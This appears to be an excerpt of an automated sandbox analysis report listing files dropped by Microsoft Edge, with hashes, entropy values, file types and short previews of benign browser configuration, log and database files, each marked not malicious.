                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[]
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[]
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):36864
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                                MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                                                SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                                                SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                                                SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):80
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                                MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                                SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                                SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                                SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:*...#................version.1..namespace-..&f.................&f...............
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):425
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.2200377724746225
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:7p43vLZYebvqBZFUtL4lh/l4tD54ZYebvqBaJ:7WflYebvygElY3oYebvL
                                                                                                                                                                                                                                                                                                MD5:850FE033D7EA0C5EB0B54368E302D2A2
                                                                                                                                                                                                                                                                                                SHA1:F064D6E44DC2F6BBCBA71129426B9158070D160D
                                                                                                                                                                                                                                                                                                SHA-256:1C060E280CFC9EAD21F28455B50CC2E818D3F0A1ECEE156019F6F0FDC6B8AB52
                                                                                                                                                                                                                                                                                                SHA-512:F68BAEBF084AAAE63FC352CF44F2AE4EE91E840003A56C5517FFA3F82F19E16AC7D9149F5881997250CA193C9E8DE7D3270C9F251818E8F9247D35EB5E18CC55
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:23.605 f70 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/01/07-07:19:23.608 f70 Recovering log #3.2025/01/07-07:19:23.613 f70 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):331
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.186909917571193
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOp4sq2PcNwi23oH+TcwtpIFUtL47nZmwl471kwOcNwi23oH+Tcwta/WLJ:7p4svLZYebmFUtL4L/l4B54ZYebaUJ
                                                                                                                                                                                                                                                                                                MD5:16BDCCD8A2A3FF35D1DABAB5AAEE50AD
                                                                                                                                                                                                                                                                                                SHA1:F14587DB34DE8303BC811BB64875EE625497AAB4
                                                                                                                                                                                                                                                                                                SHA-256:9E5652773B993352A61243872F2A5E22384B5BF65B6130E26F7FB592263ED197
                                                                                                                                                                                                                                                                                                SHA-512:D839AA88F4320D3C2106F84703B1DDB1E29B445EB83126BDE42D1A19C659B8499CAAA35E0B7EA75BF275B5B2637C9D9FB31AC0A702D6B1A7E93BA1F9B7A75BBD
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:03.049 880 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/01/07-07:19:03.050 880 Recovering log #3.2025/01/07-07:19:03.050 880 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):196608
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.2653943638295575
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:384:KrJ/2qOB1nxCkMESAELyKOMq+8HKkjucswRv8p3nVumB:K0q+n0JE9ELyKOMq+8HKkjuczRv891
                                                                                                                                                                                                                                                                                                MD5:BB724FB5E2B97BEFCB28D79E8F295FBF
                                                                                                                                                                                                                                                                                                SHA1:501FEAF1AD21607FC3CCBBB98F35504CF8AC84BA
                                                                                                                                                                                                                                                                                                SHA-256:97ED2184BD1AD5391BF6D9E815B882D0BB3C3100870D9EE1FA4A216940ABE5FF
                                                                                                                                                                                                                                                                                                SHA-512:3C661761B4D95EE66C216B2F629F2751A2A98158C8143E108CD63AD6B997ECDB3F00FB30AB5E9E5E39428BFB67827FC49B7F03F51C691B7130F8D91C8274179B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.4667347774854054
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0FQBz:v7doKsKuKZKlZNmu46yjx0WBz
                                                                                                                                                                                                                                                                                                MD5:39D95A0CA85E749B672D3362BA5E3638
                                                                                                                                                                                                                                                                                                SHA1:27C563B44B1AD7FC969C87434C23D8BF2AF18845
                                                                                                                                                                                                                                                                                                SHA-256:9537D7D7200E4913187574A637F4AC67C629F141C1CD01EB169E192772138980
                                                                                                                                                                                                                                                                                                SHA-512:4E0C7968809CC2CACE31B19EE98ADEBDB6A065F5A62944F4B4F414C85E85A40D84F67FBF603DAEAEBA20C606E0735D438773CF80037CA401AB9372C22B1E697E
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):11755
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                                MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                                SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                                SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                                SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (17682), with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):17684
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.488767684721589
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:stxJ99QTryDigabatSuypwsOzyaNPtaeN9PktuYUimYwhtngS0e1/Y8EbV+FOdQc:stxPGKSu4wsOztJtHN9mAgy2bGgQwPF
                                                                                                                                                                                                                                                                                                MD5:D574066CC0F499E24BB4D9E0BBBF2A05
                                                                                                                                                                                                                                                                                                SHA1:D9EAE353C79419F2120FB7BA649C859E889E3E57
                                                                                                                                                                                                                                                                                                SHA-256:7D52E6ABAEACB8AEF40AD4CB79BE7F1764C3A711080AA2A71F606A6EB8C386C2
                                                                                                                                                                                                                                                                                                SHA-512:15EC970D96D1E2B596C933EC972F1F250F98DE13DCF6A1D9E677BC20F96484EA50A3F7DFFE5B25B73945E07CE5559BA9809FD8107EBD0D7B3A201172B97563CB
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380725943535883","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):28672
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                                                MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                                                SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                                                SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                                                SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):115717
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.10251107689299184
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:+Y1nLY1nMspEjVl/PnnnnnnnnnnnvoQ/Eou:+uLuJoPnnnnnnnnnnnv1j
                                                                                                                                                                                                                                                                                                MD5:4635A2FAFF9D4DBBBFD0C028E6B84D84
                                                                                                                                                                                                                                                                                                SHA1:4F694BF27C5749CABB53E86207138CBCC996F2B4
                                                                                                                                                                                                                                                                                                SHA-256:25BD1C2FFC601F0855CC21F90418193C5BF5CB026C7DB617374EAC0DBEAFFC57
                                                                                                                                                                                                                                                                                                SHA-512:BC1B087A31D592373955F6DA98D1DE0C1313A255C0033D75E7EB9F8F3CF4E31693494C5DC9E61CD7BE32B6CA49987379F1817492D7AD5097B5B94B060DF39278
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):317272
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8885290450125468
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:384:1rwxrFx7zLxI8XxFCdxP7lyxaMTxrFzx/tMxRSC1TxTtv8EyyyEiyWyWKylhxyZj:C3t/2CXmx7Uoq5l52nH9Qh8
                                                                                                                                                                                                                                                                                                MD5:2CBFAFAC14F6AF3B436BB7B8AC531A6E
                                                                                                                                                                                                                                                                                                SHA1:6C1F4B349AE7AF1B6D8E9A8A6BB52D00A8A4BAD6
                                                                                                                                                                                                                                                                                                SHA-256:44CF7D266F9877E3B425EC022298C60B784FE22B007952478430503E9A56A9B1
                                                                                                                                                                                                                                                                                                SHA-512:81487FBA2624D3F2C24650453CEC9E01192D5D918ED06D9E448E8598429174D30862BE73963957A444DD97EDEC5AA39BE99B2701516FB1519F792F32EDD8AEB0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:7....-..........3.-.......F`..........3.-......+..O.\SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):485
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.0472550700633
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:/XntM+dl3sedhOmOuuuuuuuuu564illf3wZEA5PsedhOJ:llc8BOuuuuuuuuuSllf3f88
                                                                                                                                                                                                                                                                                                MD5:951A68B6E28A1015DBDC0EE09DD5D212
                                                                                                                                                                                                                                                                                                SHA1:4FCF0EE63D583E836457488469699C762676A561
                                                                                                                                                                                                                                                                                                SHA-256:F952F3942016745B4B0D06547E12A3332DC74510AFE57F5B5D36C73618A2D292
                                                                                                                                                                                                                                                                                                SHA-512:AFF42C94D1351AA9D7125BB7B5FC146D59F064172B8F0D398F12FE8BFAE75A922B0DE41E3910D3B916CC2D30D42CDB0EAE1AAA78EA07521E338A20E5773D714F
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:A..r.................20_1_1...1.,U.................20_1_1...1...0................39_config..........6.....n ...1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=.................;...............#38_h.......6.Z..W.F..........................V.e................V.e................V.e................6..Q0................39_config..........6.....n ....1
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):330
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.229010622616941
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOp4su4q2PcNwi23oH+TcwtfrK+IFUtL4suJZmwl4suDkwOcNwi23oH+TcwtfrUQ:7p4T4vLZYeb23FUtL4TJ/l4TD54ZYeb5
                                                                                                                                                                                                                                                                                                MD5:A2BADC450C5E79E34F500A0E7420BB90
                                                                                                                                                                                                                                                                                                SHA1:347E4CDF8A91315DEFDB25A4A915B9945B435F22
                                                                                                                                                                                                                                                                                                SHA-256:32335ECC5F9979A19D175FABF9D471FF0FF0FE5A695B1B3295721B8EA2675813
                                                                                                                                                                                                                                                                                                SHA-512:9B67F56CF1A2FC25F93E906636DE099E9CC9D1F49C453C40ED00D461BC2F957117F4DA3CE498D4BA5E7C8DB48F2E55DCC485104053A654A7C54966CD2303E65F
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:03.584 13f0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2025/01/07-07:19:03.584 13f0 Recovering log #3.2025/01/07-07:19:03.584 13f0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):782
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.049291162962452
                                                                                                                                                                                                                                                                                                Encrypted:false
